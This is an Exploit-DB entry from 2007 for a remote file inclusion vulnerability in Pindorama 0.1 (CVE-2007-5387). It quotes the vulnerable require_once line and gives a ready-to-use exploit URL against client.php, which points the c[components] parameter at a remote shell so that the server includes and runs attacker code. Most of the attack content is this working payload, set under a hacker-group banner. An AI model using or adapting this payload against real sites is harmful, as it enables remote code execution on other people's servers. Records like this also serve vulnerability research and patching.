Pindorama 0.1 - 'client.php' Remote File Inclusion

EDB-ID:

4519

CVE:

2007-5387

EDB Verified:

Author:

S.W.A.T.

Type:

webapps

Exploit: /

Platform:

PHP

Date:

2007-10-11

Vulnerable App:

                       \\\|///
                     \\  - -  //      Xmors Underground Group
                      (  @ @ )
               
               ----oOOo--(_)-oOOo--------------------------------------------------
               Portal   :  Pindorama 0.1
               Download :  http://downloads.sourceforge.net/pindorama/pindorama-0.1.zip
	       Author   :  S.W.A.T.
	       HomePage :  wWw.XmorS.CoM
	       Type     :  Remote File Inclusion
               Y! ID    :  Svvateam
               E-Mail   :  Svvateam@yahoo.com / S.W.4.T@hackermail.com
               Dork     :   :( 
               
               ----ooooO-----Ooooo--------------------------------------------------
                   (   )     (   )
                    \ (       ) /
                     \_)     (_/



+---------------------------------------------------------------------------------------------+

Vuln Code :

require_once($c["components"]."xmlrpc/common.php");

+---------------------------------------------------------------------------------------------+
+---------------------------------------------------------------------------------------------+

Exploit :

http://[TARGET]/[PATH]/active/components/xmlrpc/client.php?c[components]=[-Sh3ll-]


+---------------------------------------------------------------------------------------------+

# milw0rm.com [2007-10-11]

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services